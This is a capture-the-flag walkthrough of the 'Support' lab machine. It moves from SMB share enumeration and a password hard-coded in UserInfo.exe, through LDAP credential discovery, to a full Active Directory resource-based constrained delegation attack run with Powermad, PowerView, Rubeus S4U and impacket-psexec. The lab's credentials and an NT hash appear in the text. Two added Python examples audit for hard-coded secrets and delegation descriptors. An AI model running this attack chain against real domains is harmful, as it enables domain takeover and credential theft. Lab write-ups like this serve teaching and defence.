Shell as support

SMB allows us to download shares

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
support-tools   Disk      support staff tools
SYSVOL          Disk      Logon server share

smbclient //10.10.11.174/support-tools -c 'recurse;ls'

Password for [WORKGROUP\root]:
 .                                   D        0  Wed Jul 20 13:01:06 2022
 ..                                  D        0  Sat May 28 07:18:25 2022
 7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
 npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
 putty.exe                           A  1273576  Sat May 28 07:20:06 2022
 SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
 UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
 windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
 WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

        4026367 blocks of size 4096. 958078 blocks available

Located an encrypted password and username within the UserInfo.exe file

        // Token: 0x04000005 RID: 5
        private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

        // Token: 0x04000006 RID: 6
        private static byte[] key = Encoding.ASCII.GetBytes("armando");
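The two fields above are the classic shape of a hard-coded secret: a base64 blob next to a key built from a string literal. As an added example (not code from this writeup or from UserInfo.exe), the Python scanner below flags that pattern in decompiled .NET source. It looks for credential-like field names initialised from a literal, keys derived from a string literal, and base64-like literals with high Shannon entropy. The sample source is constructed from the two lines above plus two harmless declarations; the patterns and the 4.0 bits/char threshold are my own choices, not from any standard.

```python
"""Flag likely hard-coded credentials in decompiled .NET source.

Added example, not code from the writeup or from UserInfo.exe. Heuristics
(thresholds chosen here, not from any standard): a credential-like field
name initialised from a literal, a symmetric key built from a string
literal, or a base64-like literal with high Shannon entropy.
"""
import math
import re
from collections import Counter

# Constructed sample: the two fields recovered from UserInfo.exe plus two
# harmless declarations the scanner should leave alone.
SAMPLE_SOURCE = """\
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
private static byte[] key = Encoding.ASCII.GetBytes("armando");
private static string banner = "User Information Tool";
private const int timeoutSeconds = 30;
"""

NAME_HINTS = re.compile(r"passw(or)?d|secret|token|api[_-]?key|\bkey\b", re.I)
STRING_LITERAL = re.compile(r'"([^"\\]*(?:\\.[^"\\]*)*)"')
KEY_FROM_LITERAL = re.compile(r'Encoding\.\w+\.GetBytes\(\s*"[^"]+"\s*\)')
BASE64_LIKE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
ENTROPY_THRESHOLD = 4.0  # bits per character; random base64 text sits near 5-6


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for empty or single-symbol strings)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_line(line: str) -> list:
    """Return the reasons a line looks like an embedded secret (empty if clean)."""
    reasons = []
    lhs, _, rhs = line.partition("=")  # split at the assignment, not inside the literal
    literals = STRING_LITERAL.findall(rhs)
    if literals and NAME_HINTS.search(lhs):
        reasons.append("credential-like field initialised from a literal")
    if KEY_FROM_LITERAL.search(rhs):
        reasons.append("symmetric key derived from a string literal")
    for lit in literals:
        if BASE64_LIKE.match(lit) and shannon_entropy(lit) >= ENTROPY_THRESHOLD:
            reasons.append(f"high-entropy base64-like literal ({shannon_entropy(lit):.2f} bits/char)")
    return reasons


def scan_source(source: str) -> list:
    """Scan every line; each finding carries the line number, text and reasons."""
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        reasons = scan_line(line)
        if reasons:
            findings.append({"line": number, "text": line.strip(), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_source(SAMPLE_SOURCE):
        print(f"line {f['line']}: {f['text']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run it over the output of a decompiler (ILSpy, dnSpy) as a build-time or release-review check. The point the hit on line 2 makes is that a key sitting in the same binary as the ciphertext protects nothing: anyone with the file has both, which is exactly how the LDAP password was recovered here.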

Using ChatGPT to decrypt the password

I actually got stuck here as the password does not work for armando. I looked up a hint and this password is for the LDAP user…?

Finding support's password

ldapsearch -H ldap://support.htb -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"| grep -C 30 "sAMAccountName: support"

support:Ironside47pleasure40Watchful

Shell as admin

The support user has GenericAll over the domain controller

Following the BloodHound path, we can abuse this GenericAll right.

Commands to exploit this (run from the shell as support; Powermad, PowerView and Rubeus must already be on the box)

# Load Powermad and PowerView
Import-Module .\Powermad.ps1
Import-Module .\PowerView.ps1
# The DC whose msDS-AllowedToActOnBehalfOfOtherIdentity attribute we will write (this variable was left unset in the original)
$TargetComputer = 'DC.support.htb'
# Create a machine account we control and fetch its SID
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
# Build a security descriptor that names our machine account as the trustee, then serialise it
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# GenericAll on the DC lets support write the descriptor into the DC's allowed-to-act-on-behalf-of attribute
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# S4U as the machine account (the rc4 value is the NT hash of Summer2018!) to obtain a CIFS ticket for the DC as admin
.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/DC.support.htb /ptt
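The defender's counterpart to the Set-DomainObject step is to read msDS-AllowedToActOnBehalfOfOtherIdentity back from every domain controller object and check who is listed: on a DC it should normally be empty, so any allow ACE is worth investigating. As an added example (not code from this writeup, Powermad or PowerView), the Python below parses the SDDL form of that descriptor, expands each ACE's rights into names and reports trustees that are not on an expected allow-list. The attribute is stored as a binary security descriptor; this parser takes the text form that the RawSecurityDescriptor command above is built from (what .NET's RawSecurityDescriptor.GetSddlForm returns for a value read from LDAP). The sample descriptor is constructed from the command above with the $ComputerSid placeholder replaced by a made-up SID.

```python
"""Audit the SDDL descriptor written to msDS-AllowedToActOnBehalfOfOtherIdentity.

Added example, not code from the writeup, Powermad or PowerView. On a domain
controller this attribute is normally empty, so any trustee with an allow
ACE deserves a look. The attribute is stored in binary; this parser takes
the SDDL text form (what RawSecurityDescriptor.GetSddlForm produces).
"""
import re

# Access-right abbreviations used in SDDL ACE strings: generic rights plus
# the Active Directory object rights.
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
    "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "CC": "CREATE_CHILD", "DC": "DELETE_CHILD", "LC": "LIST_CHILDREN", "SW": "SELF_WRITE",
    "RP": "READ_PROPERTY", "WP": "WRITE_PROPERTY", "DT": "DELETE_TREE", "LO": "LIST_OBJECT",
    "CR": "CONTROL_ACCESS",
}

OWNER_RE = re.compile(r"O:([A-Z]{2}|S-[0-9-]+)")
GROUP_RE = re.compile(r"G:([A-Z]{2}|S-[0-9-]+)")
DACL_RE = re.compile(r"D:([A-Z]*)((?:\([^)]*\))*)")  # optional DACL flags, then the ACE list
ACE_RE = re.compile(r"\(([^)]*)\)")

# Constructed sample: the descriptor from the Set-DomainObject step with the
# $ComputerSid placeholder replaced by a made-up machine-account SID.
SAMPLE_SDDL = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-1124)"


def parse_rights(field: str) -> list:
    """Expand a rights field such as 'CCDCLC' into names; hex masks are left as-is."""
    if field.startswith("0x"):
        return [field]
    return [RIGHTS.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)]


def parse_ace(text: str) -> dict:
    """Split 'type;flags;rights;object_guid;inherit_guid;trustee' into a dict."""
    parts = text.split(";")
    if len(parts) < 6:
        raise ValueError(f"malformed ACE: {text!r}")
    ace_type, flags, rights, obj, inh_obj, trustee = parts[:6]
    return {"type": ace_type, "flags": flags, "rights": parse_rights(rights),
            "object_type": obj, "inherited_object_type": inh_obj, "trustee": trustee}


def parse_sddl(sddl: str) -> dict:
    """Return owner, group, DACL flags and the parsed DACL ACEs (SACL is ignored)."""
    owner = OWNER_RE.search(sddl)
    group = GROUP_RE.search(sddl)
    dacl = DACL_RE.search(sddl)
    aces = ACE_RE.findall(dacl.group(2)) if dacl else []
    return {
        "owner": owner.group(1) if owner else None,
        "group": group.group(1) if group else None,
        "dacl_flags": dacl.group(1) if dacl else "",
        "dacl": [parse_ace(a) for a in aces],
    }


def unexpected_delegators(sddl: str, allowed_sids: set) -> list:
    """Trustees granted an allow ACE that are not on the expected list (empty for a DC)."""
    return [ace["trustee"] for ace in parse_sddl(sddl)["dacl"]
            if ace["type"] == "A" and ace["trustee"] not in allowed_sids]


if __name__ == "__main__":
    for ace in parse_sddl(SAMPLE_SDDL)["dacl"]:
        print(ace["trustee"], "->", ", ".join(ace["rights"]))
    print("unexpected:", unexpected_delegators(SAMPLE_SDDL, set()))
```

In a real audit the allow-list holds the SIDs of services legitimately delegated to that host; for domain controllers it is empty, so every reported trustee is either a misconfiguration or the kind of write shown above. Pair it with the raw SID from Get-DomainComputer so a fresh machine account created moments before the write stands out.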

We copy the base64 ticket that Rubeus printed and decode it

cat b64_ticket.txt | base64 -d > ticket.kirbi

Then we convert the kirbi ticket into a ccache

impacket-ticketConverter ticket.kirbi ticket.ccache

Export the ticket cache path so the Impacket tools use it

export KRB5CCNAME=ticket.ccache

Remote in using the FQDN and grab root.txt

impacket-psexec -k support.htb/[email protected] -no-pass